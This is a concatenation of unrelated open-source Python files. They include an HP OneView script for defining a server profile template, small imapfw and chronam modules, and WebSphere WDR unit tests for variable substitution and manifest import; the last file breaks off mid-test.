            field=models.EmailField(help_text='Email address to send form data.', max_length=75, null=True, verbose_name='Recipient email', blank=True),
            preserve_default=True,
        ),
    ]
|
data/HewlettPackard/python-hpOneView/examples/scripts/define-profile-template.py
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import range
from future import standard_library
standard_library.install_aliases()
import sys
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if PY2:
if PYTHON_VERSION < (2, 7, 9):
raise Exception('Must use Python 2.7.9 or later')
elif PYTHON_VERSION < (3, 4):
raise Exception('Must use Python 3.4 or later')
import hpOneView as hpov
from pprint import pprint
import json
from hpOneView.common import uri
import hpOneView.profile as profile
def acceptEULA(con):
    """Dismiss the appliance EULA prompt if one is pending.

    Checks the EULA status once on *con* and, when a EULA display is
    required, declines it so scripted sessions can proceed.  Any error is
    printed and swallowed so login can still be attempted.

    :param con: hpOneView connection object.
    """
    try:
        # Single status query (a redundant duplicate call whose result was
        # discarded has been removed).
        if con.get_eula_status() is True:
            print('EULA display needed')
            con.set_eula('no')
    except Exception as e:
        print('EXCEPTION:')
        print(e)
def login(con, credential):
    """Log in to the appliance, printing a message on failure.

    :param con: hpOneView connection object.
    :param credential: Credential dict/object accepted by ``con.login``.
    """
    try:
        con.login(credential)
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; narrowed to Exception.
        print('Login failed')
def get_eg_uri_from_arg(srv, name):
    """Resolve an enclosure-group argument to a URI.

    *name* may already be an enclosure-group URI (returned unchanged) or an
    enclosure-group name, which is looked up via *srv*.  Returns None when
    either argument is falsy or no group matches.
    """
    if not (srv and name):
        return None
    # Already a URI -- pass it straight through.
    if name.startswith('/rest') and uri['enclosureGroups'] in name:
        return name
    # Otherwise search the appliance's enclosure groups by name.
    for group in srv.get_enclosure_groups():
        if group['name'] == name:
            return group['uri']
    return None
def get_sht_from_arg(srv, name):
    """Resolve a server-hardware-type argument.

    If *name* is already a server-hardware-type URI it is returned as-is;
    otherwise the appliance's hardware types are searched by name and the
    matching record (a dict) is returned.  Returns None on no match or
    falsy arguments.
    """
    if not (srv and name):
        return None
    # Already a URI -- pass it straight through.
    if name.startswith('/rest') and uri['server-hardware-types'] in name:
        return name
    # Otherwise look the type up by display name.
    for hw_type in srv.get_server_hardware_types():
        if hw_type['name'] == name:
            return hw_type
    return None
def define_profile_template(
        srv,
        name,
        desc,
        sp_desc,
        server_hwt,
        enc_group,
        affinity,
        hide_flexnics,
        conn_list,
        fw_settings,
        boot,
        bootmode):
    """Create a server profile template via *srv* and print a summary.

    conn_list, when given, is a path to a JSON file describing the
    profile connections; otherwise an empty connection list is sent.
    """
    if conn_list:
        conn = json.loads(open(conn_list).read())
    else:
        conn = []
    profile_template = srv.create_server_profile_template(
        name=name,
        description=desc,
        serverProfileDescription=sp_desc,
        serverHardwareTypeUri=server_hwt,
        enclosureGroupUri=enc_group,
        affinity=affinity,
        hideUnusedFlexNics=hide_flexnics,
        profileConnectionV4=conn,
        firmwareSettingsV3=fw_settings,
        bootSettings=boot,
        bootModeSetting=bootmode)
    # A 'serialNumberType' key signals a well-formed template reply: print a
    # human-readable summary; otherwise dump the raw response for debugging.
    if 'serialNumberType' in profile_template:
        print('\n\nName:                ', profile_template['name'])
        print('Type:                ', profile_template['type'])
        print('Description:         ', profile_template['description'])
        print('serialNumberType:    ', profile_template['serialNumberType'])
        print('Connections:')
        for connection in profile_template['connections']:
            print('  name:          ', connection['name'])
            print('  functionType:  ', connection['functionType'])
            print('  networkUri:    ', connection['networkUri'])
        print('Firmware:')
        print('  manageFirmware:       ', profile_template['firmware']['manageFirmware'])
        print('  forceInstallFirmware: ', profile_template['firmware']['forceInstallFirmware'])
        print('  firmwareBaselineUri:  ', profile_template['firmware']['firmwareBaselineUri'])
        print('Bios:')
        print('  manageBios:         ', profile_template['bios']['manageBios'])
        print('  overriddenSettings: ', profile_template['bios']['overriddenSettings'])
        print('Boot:')
        print('  manageBoot: ', profile_template['boot']['manageBoot'])
        print('  order:      ', profile_template['boot']['order'], '\n')
    else:
        pprint(profile_template)
def main():
    """Parse CLI arguments, connect to the HP OneView appliance and
    define a server profile template from the given options."""
    parser = argparse.ArgumentParser(add_help=True,
                                     formatter_class=argparse.RawTextHelpFormatter,
                                     description='''
Define a server profile template''')
    parser.add_argument('-a', dest='host', required=True,
                        help='''
HP OneView Appliance hostname or IP address''')
    parser.add_argument('-u', dest='user', required=False,
                        default='Administrator',
                        help='''
HP OneView Username''')
    parser.add_argument('-p', dest='passwd', required=True,
                        help='''
HP OneView Password''')
    parser.add_argument('-c', dest='cert', required=False,
                        help='''
Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
    parser.add_argument('-y', dest='proxy', required=False,
                        help='''
Proxy (host:port format''')
    parser.add_argument('-n', dest='name',
                        required=True,
                        help='''
Name of the profile template''')
    parser.add_argument('-d', dest='desc',
                        required=False,
                        help='''
Description for the server profile template''')
    parser.add_argument('-spd', dest='sp_desc',
                        required=False,
                        help='''
Server profile description''')
    parser.add_argument('-sht', dest='server_hwt', required=True,
                        help='''
Server hardware type is required for defining an unassigned profile. Note
the Server Hardware Type must be present in the HP OneView appliance
before it can be used. For example, a single server with the specific server
hardware type must have been added to OneView for that hardware type to
be used. The example script get-server-hardware-types.py with the -l
argument can be used to get a list of server hardware types that have
been imported into the OneView appliance''')
    parser.add_argument('-eg', dest='enc_group', required=True,
                        help='''
Identifies the enclosure group for which the Server Profile Template
was designed. The enclosureGroupUri is determined when the profile
template is created and cannot be modified
''')
    parser.add_argument('-af', dest='affinity',
                        required=False, choices=['Bay', 'BayAndServer'],
                        default='Bay',
                        help='''
This identifies the behavior of the server profile when the server
hardware is removed or replaced.
. Bay: This profile remains with the device bay when the server
hardware is removed or replaced.
. BayAndServer This profile is pinned to both the device bay and
specific server hardware.''')
    parser.add_argument('-hn', dest='hide_flexnics',
                        required=False, choices=['true', 'false'],
                        help='''
This setting controls the enumeration of physical functions that do not
correspond to connections in a profile. Using this flag will SHOW unused
FlexNICs to the Operating System. Changing this setting may alter the order
of network interfaces in the Operating System. This option sets the 'Hide
Unused FlexNICs' to disabled, eight FlexNICs will be enumerated in the
Operating System as network interfaces for each Flex-10 or FlexFabric
adapter. Configuring Fibre Channel connections on a FlexFabric adapter may
enumerate two storage interfaces, reducing the number of network interfaces
to six. The default (this option is not selected) enables 'Hide Unused
FlexNICs' and may suppress enumeration of FlexNICs that do not correspond
to profile connections. FlexNICs are hidden in pairs, starting with the 4th
pair. For instance, if the 4th FlexNIC on either physical port corresponds
to a profile connection, all eight physical functions are enumerated. If a
profile connection corresponds to the 2nd FlexNIC on either physical port,
but no connection corresponds to the 3rd or 4th FlexNIC on either physical
port, only the 1st and 2nd physical functions are enumerated in the
Operating System.''')
    parser.add_argument('-cl', dest='conn_list',
                        required=False,
                        help='''
File with list of connections for this profile in JSON format. This file
can be created with multiple calls to define-connection-list.py''')
    parser.add_argument('-fw', dest='baseline', required=False,
                        help='''
SPP Baseline file name. e.g. SPP2013090_2013_0830_30.iso''')
    parser.add_argument('-mb', dest='disable_manage_boot',
                        action='store_true',
                        help='''
Explicitly DISABLE Boot Order Management. This value is enabled by
default and required for Connection boot enablement. If this option is
disabled, then PXE and FC BfS settings are disabled within the entire
Server Profile.''')
    parser.add_argument('-bo', dest='boot_order', required=False,
                        nargs='+',
                        help='''
Defines the order in which boot will be attempted on the available
devices. Please NOTE the supported boot order is server hardware type
specific. For Gen7 and Gen8 server hardware the possible values are 'CD',
'Floppy', 'USB', 'HardDisk', and 'PXE'. For Gen9 BL server hardware in
Legacy BIOS boot mode, the possible values are 'CD', 'USB', 'HardDisk',
and 'PXE'. For Gen9 BL server hardware in UEFI or UEFI Optimized boot
mode, only one value is allowed and must be either 'HardDisk' or 'PXE'.
For Gen9 DL server hardware in Legacy BIOS boot mode, the possible
values are 'CD', 'USB', 'HardDisk', and 'PXE'. For Gen9 DL server
hardware in UEFI or UEFI Optimized boot mode, boot order configuration
is not supported.
Server boot order defined as a list separated by spaces. For example:
Gen7/8 BIOS Default Boot Order:
-bo CD Floppy USB HardDisk PXE
Gen9 Legacy BIOS Boot Order:
-bo CD USB HardDisk PXE
Gen9 UEFI Default Boot Order:
-bo HardDisk
''')
    parser.add_argument('-bm', dest='boot_mode', required=False,
                        choices=['UEFI', 'UEFIOptimized', 'BIOS'],
                        default='BIOS',
                        help='''
Specify the Gen9 Boot Environment.
Sets the boot mode as one of the following:
. UEFI
. UEFIOptimized
. BIOS
If you select UEFI or UEFI optimized for an HP ProLiant DL Gen9 rack
mount server, the remaining boot setting available is the PXE boot policy.
For the UEFI or UEFI optimized boot mode options, the boot mode choice
should be based on the expected OS and required boot features for the
server hardware. UEFI optimized boot mode reduces the time the system
spends in POST(Video driver initialization). In order to select the
appropriate boot mode, consider the following:
. If a secure boot is required, the boot mode must be set to UEFI
or UEFI optimized .
. For operating systems that do not support UEFI (such as DOS, or
older versions of Windows and Linux), the boot mode must be set
to BIOS.
. When booting in UEFI mode, Windows 7, Server 2008, or 2008 R2
should not be set to UEFIOptimized.''')
    parser.add_argument('-px', dest='pxe', required=False,
                        choices=['Auto', 'IPv4', 'IPv6',
                                 'IPv4ThenIPv6', 'IPv6ThenIPv4'],
                        default='IPv4',
                        help='''
Controls the ordering of the network modes available to the Flexible
LOM (FLB); for example, IPv4 and IPv6.
Select from the following policies:
. Auto
. IPv4 only
. IPv6 only
. IPv4 then IPv6
. IPv6 then IPv4
Setting the policy to Auto means the order of the existing network boot
targets in the UEFI Boot Order list will not be modified, and any new
network boot targets will be added to the end of the list using the
System ROM's default policy.''')
    args = parser.parse_args()
    credential = {'userName': args.user, 'password': args.passwd}
    # Build the appliance connection plus the servers/settings helpers.
    con = hpov.connection(args.host)
    srv = hpov.servers(con)
    sts = hpov.settings(con)
    if args.proxy:
        con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
    if args.cert:
        con.set_trusted_ssl_bundle(args.cert)
    login(con, credential)
    acceptEULA(con)
    # Resolve the enclosure group and server hardware type arguments,
    # which may be given as names or REST URIs.
    eg_uri = get_eg_uri_from_arg(srv, args.enc_group)
    sht = get_sht_from_arg(srv, args.server_hwt)
    fw_settings = profile.make_firmware_dict(sts, args.baseline)
    boot, bootmode = profile.make_boot_settings_dict(srv, sht, args.disable_manage_boot,
                                                     args.boot_order, args.boot_mode, args.pxe)
    define_profile_template(srv,
                            args.name,
                            args.desc,
                            args.sp_desc,
                            sht['uri'],
                            eg_uri,
                            args.affinity,
                            args.hide_flexnics,
                            args.conn_list,
                            fw_settings,
                            boot,
                            bootmode)
if __name__ == '__main__':
    # argparse is imported lazily here; main() is only ever called from
    # this guard, so the name is in scope when it is needed.
    # NOTE(review): `sys` is not imported in this view -- presumably
    # imported at the top of the file; confirm.
    import argparse
    sys.exit(main())
|
data/OfflineIMAP/imapfw/imapfw/mmp/folder.py
|
from imapfw import runtime
from .manager import Manager
class FolderManager(Manager):
    """Manager for folder workers; exposes the runtime rascal."""

    def __init__(self):
        super(FolderManager, self).__init__()
        # Cache the rascal (user configuration object) from the runtime.
        self.rascal = runtime.rascal
|
data/LibraryOfCongress/chronam/core/management/commands/index_pages.py
|
from django.core.management.base import BaseCommand
from chronam.core.management.commands import configure_logging
from chronam.core.index import index_pages
# Configure logging before the command runs so index_pages output is
# written to index_pages.log.
configure_logging("index_pages_logging.config", "index_pages.log")


class Command(BaseCommand):
    """Django management command that (re)indexes all newspaper pages."""

    def handle(self, **options):
        # Delegate to the core indexing routine.
        index_pages()
|
data/WDR/WDR/lib/tests/wdrtest/manifest.py
|
import unittest
import string
import wdr
from wdr.app import *
from wdr.config import *
from wdr.control import *
from wdr.manifest import *
from wdr.util import *
from wdrtest.topology import topology
# Resolve the wsadmin scripting objects for this process.
(
    AdminApp, AdminConfig, AdminControl, AdminTask, Help
) = wdr.WsadminObjects().getObjects()
class AbstractConfigTest(unittest.TestCase):
def tearDown(self):
reset()
def assertTrue(self, value, msg=None):
self.assertNotEqual(0, value, msg)
def assertFalse(self, value, msg=None):
self.assertEqual(0, value, msg)
def assertNone(self, value, msg=None):
if value is not None:
raise AssertionError(msg or '%s not None' % value)
def assertNotNone(self, value, msg=None):
if value is None:
raise AssertionError(msg or '%s not None' % value)
class VariableSubstitutionTest(unittest.TestCase):
    """Tests of substituteVariables: $[...] expansion against a dict."""

    def testSimple(self):
        """Plain variable reference."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[name]!', {'name': 'world'})
        )

    def testWithMixedCase(self):
        """Mixed-case variable names are looked up as written."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[Name]!', {'Name': 'world'})
        )

    def testWithDigits(self):
        """Digits are allowed in variable names."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[name0]!', {'name0': 'world'})
        )

    def testWithUnderscores(self):
        """Underscores are allowed in variable names."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[the_name]!', {'the_name': 'world'})
        )

    def testWithUnderscorePrefix(self):
        """Names may start with an underscore."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[_name]!', {'_name': 'world'})
        )

    def testWithUnderscoreOnly(self):
        """A lone underscore is a valid variable name."""
        self.assertEquals(
            'Hello world!',
            substituteVariables('Hello $[_]!', {'_': 'world'})
        )

    def testWithNestedDictionary(self):
        """Dotted expressions traverse nested dictionaries."""
        self.assertEquals(
            'Hello world!',
            substituteVariables(
                'Hello $[person.name]!', {'person': {'name': 'world'}}
            )
        )

    def testWithDoubleNestedDictionary(self):
        """Traversal works two levels deep."""
        self.assertEquals(
            'Hello John Peter Smith!',
            substituteVariables(
                'Hello '
                '$[person.name.first] '
                '$[person.name.second] '
                '$[person.name.last]!',
                {
                    'person': {
                        'name': {
                            'first': 'John',
                            'second': 'Peter',
                            'last': 'Smith',
                        }
                    }
                }
            )
        )

    def testNone(self):
        """None renders as an empty string."""
        self.assertEquals(
            'Hello !',
            substituteVariables('Hello $[name]!', {'name': None})
        )

    def testNumber(self):
        """Numbers render via their string representation."""
        self.assertEquals(
            'Hello 123!',
            substituteVariables('Hello $[name]!', {'name': 123})
        )

    def testList(self):
        """Lists render via their string representation."""
        self.assertEquals(
            'Hello [123, 456]!',
            substituteVariables('Hello $[name]!', {'name': [123, 456]})
        )

    def testTuple(self):
        """Tuples render via their string representation."""
        self.assertEquals(
            'Hello (123, 456)!',
            substituteVariables('Hello $[name]!', {'name': (123, 456)})
        )

    def testCallable(self):
        """Callable values are invoked with (expression, variables)."""
        self.assertEquals(
            'Hello world!',
            substituteVariables(
                'Hello $[name]!',
                {'name': lambda expression, variables: 'world'}
            )
        )

    def testCallableReturningNone(self):
        """A callable returning None renders as an empty string."""
        self.assertEquals(
            'Hello !',
            substituteVariables(
                'Hello $[name]!',
                {'name': lambda expression, variables: None}
            )
        )

    def testWithExtraSpaces(self):
        """Whitespace around the expression is ignored."""
        self.assertEquals(
            'Hello world!',
            substituteVariables(
                'Hello $[ person.name ]!',
                {'person': {'name': 'world'}}
            )
        )
class VariableSubstitutionWithFilteringTest(unittest.TestCase):
    """Tests of the $[value|filter] pipe syntax in substituteVariables."""

    def testUpper(self):
        """The filter name resolves to a callable in the same dict."""
        self.assertEquals(
            'Hello WORLD!',
            substituteVariables(
                'Hello $[name|upper]!',
                {'name': 'world', 'upper': string.upper}
            )
        )

    def testListProcessing(self):
        """Filters can collapse a list into a single string."""
        self.assertEquals(
            'Hello John Smith!',
            substituteVariables(
                'Hello $[name|join]!',
                {'name': ['John', 'Smith'], 'join': string.join}
            )
        )

    def testListWithLambdaOnList(self):
        """A lambda filter formats a nested list-of-lists value."""
        self.assertEquals(
            'deploymentTargets are '
            '['
            'WebSphere'
            ':cell=wdrCell,cluster=wdrCluster+WebSphere'
            ':cell=wdrCell,node=httpNode01,server=httpServer01'
            ']',
            substituteVariables(
                'deploymentTargets are '
                '[$[deploymentTargets|joinDeploymentTargets]]',
                {
                    'deploymentTargets': [
                        [
                            ['cell', 'wdrCell'],
                            ['cluster', 'wdrCluster'],
                        ],
                        [
                            ['cell', 'wdrCell'],
                            ['node', 'httpNode01'],
                            ['server', 'httpServer01'],
                        ]
                    ],
                    'joinDeploymentTargets':
                        lambda targetList: ('+'.join(
                            [
                                'WebSphere:'
                                + ','.join(
                                    ['='.join(attList) for attList in target]
                                )
                                for target in targetList
                            ]
                        )
                        )
                }
            )
        )

    def testListWithLambdaOnDict(self):
        """A lambda filter formats a list of dicts, clusters first."""
        self.assertEquals(
            'deploymentTargets are '
            '['
            'WebSphere'
            ':cell=wdrCell,cluster=wdrCluster+WebSphere'
            ':cell=wdrCell,node=httpNode01,server=httpServer01'
            ']',
            substituteVariables(
                'deploymentTargets are '
                '[$[deploymentTargets|joinDeploymentTargets]]',
                {
                    'deploymentTargets': [
                        {
                            'cell': 'wdrCell',
                            'cluster': 'wdrCluster',
                        },
                        {
                            'cell': 'wdrCell',
                            'node': 'httpNode01',
                            'server': 'httpServer01',
                        }
                    ],
                    'joinDeploymentTargets':
                        lambda targetList: (
                            '+'.join(
                                [
                                    'WebSphere:cell=%(cell)s,cluster=%(cluster)s'
                                    % t
                                    for t in filter(
                                        lambda e: e.get('cluster'), targetList
                                    )
                                ]
                                +
                                [
                                    'WebSphere'
                                    ':cell=%(cell)s,node=%(node)s,server=%(server)s'
                                    % t
                                    for t in filter(
                                        lambda e: e.get('node') and e.get('server'),
                                        targetList
                                    )
                                ]
                            )
                        )
                }
            )
        )

    def testWithExtraSpaces(self):
        """Whitespace around value and filter names is ignored."""
        self.assertEquals(
            'Hello WORLD!',
            substituteVariables(
                'Hello $[ name | upper ]!',
                {'name': 'world', 'upper': string.upper}
            )
        )
class BasicManifestImportTest(AbstractConfigTest):
    """Attribute-level manifest imports: strings, booleans, ints, enums."""

    def testUpdateStrings(self):
        """Modifying single string attribute"""
        srv = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        importConfigurationManifest(
            'wdrtest/manifests/basic/string_attribute_change.wdrc', topology
        )
        self.assertEquals(srv.changeUserAfterStartup, 'vagrant')
        self.assertEquals(srv.changeGroupAfterStartup, 'vagrant')

    def testUpdateBooleans(self):
        """Modifying boolean attributes"""
        srv = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        # Pre-conditions: manifest must flip both flags.
        self.assertFalse(srv.developmentMode)
        self.assertTrue(srv.parallelStartEnabled)
        importConfigurationManifest(
            'wdrtest/manifests/basic/boolean_attribute_change.wdrc', topology
        )
        self.assertTrue(srv.developmentMode)
        self.assertFalse(srv.parallelStartEnabled)

    def testUpdateBooleanWithInvalidValue(self):
        """Attempting to assign invalid value to a boolean attribute"""
        srv = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        self.assertTrue(srv.parallelStartEnabled)
        importConfigurationManifest(
            'wdrtest/manifests/basic/boolean_attribute_invalid.wdrc', topology
        )
        self.assertFalse(srv.developmentMode)

    def testUpdateInteger(self):
        """Updating integer attribute"""
        jvm = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:/'
            % topology
        )
        self.assertEquals(jvm.initialHeapSize, 0)
        self.assertEquals(jvm.maximumHeapSize, 0)
        importConfigurationManifest(
            'wdrtest/manifests/basic/integer_attribute_change.wdrc', topology
        )
        self.assertEquals(jvm.initialHeapSize, 12345)
        self.assertEquals(jvm.maximumHeapSize, 67890)

    def testUpdateEnum(self):
        """Updating enum attribute"""
        cell = getid1(
            '/Cell:%(cellName)s/'
            % topology
        )
        self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')
        importConfigurationManifest(
            'wdrtest/manifests/basic/enum_attribute_change.wdrc', topology
        )
        self.assertEquals(cell.cellDiscoveryProtocol, 'UDP')

    def testUpdateEnumWithInvalidValue(self):
        """Attempting to assign invalid enum value to an attribute"""
        cell = getid1(
            '/Cell:%(cellName)s/'
            % topology
        )
        self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')
        # failure stays 0 only if the import raises, which is expected.
        failure = 0
        try:
            importConfigurationManifest(
                'wdrtest/manifests/basic/enum_attribute_invalid.wdrc', topology
            )
            failure = 1
        except:
            pass
        self.assertFalse(failure, 'should fail on invalid enum value')
        self.assertEquals(cell.cellDiscoveryProtocol, 'TCP')

    def testFailOnInvalidType(self):
        """Attempting use invalid object type"""
        failure = 0
        try:
            importConfigurationManifest(
                'wdrtest/manifests/basic/fail_on_invalid_type.wdrc', topology
            )
            failure = 1
        except:
            pass
        self.assertFalse(failure, 'should fail on invalid type')

    def testFailOnInvalidKey(self):
        """Attempting use invalid object attribute in key"""
        failure = 0
        try:
            importConfigurationManifest(
                'wdrtest/manifests/basic/fail_on_invalid_key.wdrc', topology
            )
            failure = 1
        except:
            pass
        self.assertFalse(failure, 'should fail on invalid key')

    def testFailOnInvalidAttribute(self):
        """Attempting use invalid object attribute"""
        failure = 0
        try:
            importConfigurationManifest(
                'wdrtest/manifests/basic/fail_on_invalid_attribute.wdrc',
                topology
            )
            failure = 1
        except:
            pass
        self.assertFalse(failure, 'should fail on invalid attribute')

    def testCommentsValid(self):
        """Comments in manifests"""
        importConfigurationManifest(
            'wdrtest/manifests/basic/comments_valid.wdrc', topology
        )

    def testCommentIndented(self):
        """Indented comments must not register configuration changes."""
        importConfigurationManifest(
            'wdrtest/manifests/basic/comment_indented.wdrc', topology
        )
        self.assertFalse(hasChanges())

    def testNoChanges(self):
        """A no-op manifest must not register configuration changes."""
        importConfigurationManifest(
            'wdrtest/manifests/basic/no_changes.wdrc', topology
        )
        self.assertFalse(hasChanges())
class HierarchiesManifestImportTest(AbstractConfigTest):
    """Manifest imports that create nested object hierarchies."""

    def testOneChild(self):
        """Creating a single child object (JDBCProvider) from a manifest."""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(providers, [])
        importConfigurationManifest(
            'wdrtest/manifests/hierarchies/one_child.wdrc', topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(len(providers), 1)
        db2provider = providers[0]
        self.assertEquals(db2provider.name, 'DB2 Provider')
        self.assertEquals(db2provider.classpath, ['a', 'b', 'c'])
        self.assertTrue(db2provider.xa)

    def testMultipleChildren(self):
        """Creating several sibling children in one manifest."""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(providers, [])
        importConfigurationManifest(
            'wdrtest/manifests/hierarchies/multiple_children.wdrc', topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(len(providers), 2)
        db2provider = providers[0]
        self.assertEquals(db2provider.name, 'DB2 Provider')
        self.assertEquals(db2provider.classpath, ['a', 'b', 'c'])
        self.assertFalse(db2provider.xa)
        db2provider = providers[1]
        self.assertEquals(db2provider.name, 'MS SQL Provider')
        self.assertEquals(db2provider.classpath, ['d', 'e', 'f'])
        self.assertTrue(db2provider.xa)

    def testMultipleChildrenInList(self):
        """Appending children to a list-valued attribute."""
        cellVariables = getid1(
            '/Cell:%(cellName)s/VariableMap:/'
            % topology
        )
        variableCount = len(cellVariables.entries)
        importConfigurationManifest(
            'wdrtest/manifests/hierarchies/multiple_children_in_list.wdrc',
            topology
        )
        self.assertEquals(len(cellVariables.entries), variableCount+2)

    def testMultipleChildrenInAttribute(self):
        """Creating children nested under an attribute object."""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(providers, [])
        importConfigurationManifest(
            'wdrtest/manifests/hierarchies/multiple_children_in_attribute.wdrc',
            topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(len(providers), 1)
        db2provider = providers[0]
        self.assertEquals(db2provider.name, 'DB2 Provider')
        self.assertEquals(len(db2provider.propertySet.resourceProperties), 2)

    def testRepeatedObjects(self):
        """Importing a manifest that mentions the same object twice."""
        importConfigurationManifest(
            'wdrtest/manifests/hierarchies/repeated_objects.wdrc', topology
        )
        server = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        # NOTE(review): referenceList is never asserted on -- lookup1
        # raising on a missing/duplicate object is the implicit check here.
        referenceList = server.lookup1(
            'CustomService',
            {
                'displayName': 'first',
            },
            'customServices'
        )
class IncludesAndImportsTest(AbstractConfigTest):
    """Manifest import/include directives."""

    def testImportValid(self):
        """An imported manifest's changes are applied."""
        cellVariables = getid1(
            '/Cell:%(cellName)s/VariableMap:/'
            % topology
        )
        variableCount = len(cellVariables.entries)
        importConfigurationManifest(
            'wdrtest/manifests/imports/import_valid.wdrc', topology
        )
        self.assertEquals(len(cellVariables.entries), variableCount + 2)

    def testIncludeWithPath(self):
        """Includes with an explicit path contribute their own changes."""
        cellVariables = getid1(
            '/Cell:%(cellName)s/VariableMap:/'
            % topology
        )
        variableCount = len(cellVariables.entries)
        importConfigurationManifest(
            'wdrtest/manifests/imports/include_with_path.wdrc', topology
        )
        self.assertEquals(len(cellVariables.entries), variableCount + 3)

    def testIncludeWithoutPath(self):
        """Includes without a path resolve relative to the manifest."""
        cellVariables = getid1(
            '/Cell:%(cellName)s/VariableMap:/'
            % topology
        )
        variableCount = len(cellVariables.entries)
        importConfigurationManifest(
            'wdrtest/manifests/imports/include_without_path.wdrc', topology
        )
        self.assertEquals(len(cellVariables.entries), variableCount + 2)
class VariablesAndFiltersTest(AbstractConfigTest):
    """Callable variables/filters used inside configuration manifests."""

    def testCallables(self):
        """Manifest variables may be lambdas applied to other variables."""
        d = {}
        d.update(topology)
        # 'first'/'last' pick elements of 'list' inside the manifest.
        d['list'] = ['a', 'b', 'c', 'd']
        d['first'] = lambda x: x[0]
        d['last'] = lambda x: x[-1]
        cellVariables = getid1(
            '/Cell:%(cellName)s/VariableMap:/'
            % topology
        )
        variableCount = len(cellVariables.entries)
        importConfigurationManifest(
            'wdrtest/manifests/vars/callables.wdrc',
            d
        )
        self.assertEquals(len(cellVariables.entries), variableCount + 2)
        self.assertEquals(cellVariables.entries[-2].symbolicName, 'a')
        self.assertEquals(cellVariables.entries[-2].value, 'val1')
        self.assertEquals(cellVariables.entries[-1].symbolicName, 'd')
        self.assertEquals(cellVariables.entries[-1].value, 'val2')
class ReferencesTest(AbstractConfigTest):
    """Manifests that assign cross-object references to attributes."""

    def testMailProtocolProvider(self):
        """Assigning reference to attribute"""
        smtpProtocol = getid1(
            '/Cell:%(cellName)s/MailProvider:Built-in Mail Provider/'
            % topology
        ).lookup1(
            'ProtocolProvider',
            {
                'protocol': 'smtp',
            },
            'protocolProviders'
        )
        importConfigurationManifest(
            'wdrtest/manifests/references/mail_protocol_provider.wdrc', topology
        )
        mailSession = getid1(
            '/Cell:%(cellName)s'
            '/MailProvider:Built-in Mail Provider'
            '/MailSession:test mail session'
            % topology
        )
        # Compare by string form since the ids are config-object handles.
        self.assertEquals(
            str(mailSession.mailTransportProtocol), str(smtpProtocol)
        )
        self.assertEquals(mailSession.name, 'test mail session')
        self.assertEquals(mailSession.jndiName, 'mail/test')
        self.assertEquals(mailSession.mailTransportHost, 'smtp.example.com')

    def testDependentService(self):
        """Assigning multiple references to attribute"""
        importConfigurationManifest(
            'wdrtest/manifests/references/dependent_service.wdrc', topology
        )
        server = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        referenceList = server.lookup1(
            'CustomService',
            {
                'displayName': 'with dependencies',
            },
            'customServices'
        ).prerequisiteServices
        self.assertEquals(len(referenceList), 3)
        self.assertEquals(referenceList[0].displayName, 'first')
        self.assertEquals(referenceList[1].displayName, 'second')
        self.assertEquals(referenceList[2].displayName, 'fifth')

    def testDependentServiceExtension(self):
        """Assigning more references to an attribute"""
        importConfigurationManifest(
            'wdrtest/manifests/references/dependent_service.wdrc', topology
        )
        importConfigurationManifest(
            'wdrtest/manifests/references/dependent_service2.wdrc', topology
        )
        server = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        referenceList = server.lookup1(
            'CustomService',
            {
                'displayName': 'with dependencies',
            },
            'customServices'
        ).prerequisiteServices
        # The second manifest appends to, not replaces, the reference list.
        self.assertEquals(len(referenceList), 5)
        self.assertEquals(referenceList[0].displayName, 'first')
        self.assertEquals(referenceList[1].displayName, 'second')
        self.assertEquals(referenceList[2].displayName, 'fifth')
        self.assertEquals(referenceList[3].displayName, 'third')
        self.assertEquals(referenceList[4].displayName, 'fourth')
class RemovalTest(AbstractConfigTest):
    """Manifests that remove objects and references."""

    def testJdbcProvider(self):
        """Removing JDBCProvider - a child of another object (Server)"""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider/'
            % topology
        )
        self.assertEquals(len(providers), 1)
        importConfigurationManifest(
            'wdrtest/manifests/removal/jdbc_provider.wdrc', topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider/'
            % topology
        )
        self.assertEquals(len(providers), 0)

    def testJvmProperty(self):
        """Removing Property from JavaVirtualMachine.systemProperties"""
        prop = getid(
